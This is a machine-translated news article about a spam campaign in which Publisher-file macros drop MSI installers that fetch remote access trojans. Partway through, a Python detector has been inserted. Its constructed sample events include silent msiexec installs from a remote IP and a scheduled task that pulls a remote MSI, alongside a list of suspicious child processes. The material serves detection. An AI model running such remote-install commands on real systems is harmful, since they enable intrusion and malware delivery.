Trend Micro researchers report that new macro downloaders are using Microsoft Publisher (PUB) files and spam mails to break into the networks of companies in the food and retail sectors.
Last month, more than 50 companies from these sectors were targeted in the campaign, among them Starbucks and Harris Teeter. Trend Micro also detected attacks against the U.S. Department of Agriculture and the financial sector.
The use of PUB files distinguishes this campaign from others: PUB files are not usually associated with macro malware. Combined with socially engineered spam mails that appear to come from operations teams, the PUB "invoices" look legitimate. Once opened, they drop rogue Microsoft Installer (MSI) files that contact command-and-control (C&C) servers to install remote access trojans.
Because PUB files are rarely used by macro downloaders and MSI files are also used for legitimate installations, infections may go unnoticed by users and standard anti-malware tools for a long time. In addition, companies in the food and retail sectors are in their busiest quarter of the year, which increases the chance that they fall for the spam.
The use of PUB files by cyber criminals increases this risk, because employees may not regard the files as potential threats. The installed trojans can then remain hidden until the attackers are ready to strike or to download further malware.
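The infection chain described here (a Publisher document whose macro hands off to the Windows installer, which fetches an MSI from a remote host) leaves a recognisable trail in process-creation telemetry. The following detector is an added illustration, not part of the Trend Micro report or this article; the Sysmon-style event records, the documentation-range IP address 203.0.113.7 and the file names are constructed sample data, and the list of suspicious child processes is an assumption to be tuned per environment.

```python
import re
from typing import Dict, List, Tuple

# Child images that a Publisher process has no legitimate reason to launch
# (assumption: extend or trim this set for your own environment).
SUSPICIOUS_CHILDREN = {"msiexec.exe", "schtasks.exe", "wscript.exe", "cscript.exe",
                       "powershell.exe", "cmd.exe", "mshta.exe"}
REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed sample of process-creation events (not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\MSPUB.EXE",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /i http://203.0.113.7/invoice.msi /qn"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\MSPUB.EXE",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": 'schtasks.exe /create /tn "Invoice Update" '
                    '/tr "msiexec.exe /i https://203.0.113.7/update.msi /q" /sc once /st 23:30'},
    {"ParentImage": r"C:\Windows\explorer.exe",          # benign local install
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\alice\Downloads\7zip.msi"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\MSPUB.EXE",
     "Image": r"C:\Windows\splwow64.exe",                 # benign print helper
     "CommandLine": "splwow64.exe 12288"},
]


def _basename(path: str) -> str:
    """Lower-case file name of a Windows path, tolerant of forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of the detection rules an event triggers (empty if benign)."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits: List[str] = []
    # Rule 1: Publisher spawning an installer, scheduler or script host.
    if parent == "mspub.exe" and image in SUSPICIOUS_CHILDREN:
        hits.append("publisher-spawned-child")
    # Rule 2: msiexec installing straight from a URL (legitimate installs are local files).
    if image == "msiexec.exe" and REMOTE_URL.search(cmd):
        hits.append("remote-msi-install")
    # Rule 3: a scheduled task whose action is a remote MSI install (delayed download).
    low = cmd.lower()
    if image == "schtasks.exe" and "/create" in low and "msiexec" in low and REMOTE_URL.search(cmd):
        hits.append("scheduled-remote-msi")
    return hits


def find_suspicious(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Pair each alerting event's index with the rules it triggered."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```

Run against `SAMPLE_EVENTS`, the two Publisher-launched events alert while the local install and the print helper stay silent.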
Furthermore, the campaign avoids notice by scheduling the download of the MSI file rather than fetching it directly when the PUB file is opened. The trojans that are finally installed can steal customer data or penetrate business networks.

This news article was automatically translated from Dutch to give Techzine.eu a head start. All news articles after September 1, 2019 are written in native English and NOT translated. All our background stories are written in native English as well. For more information read our launch article.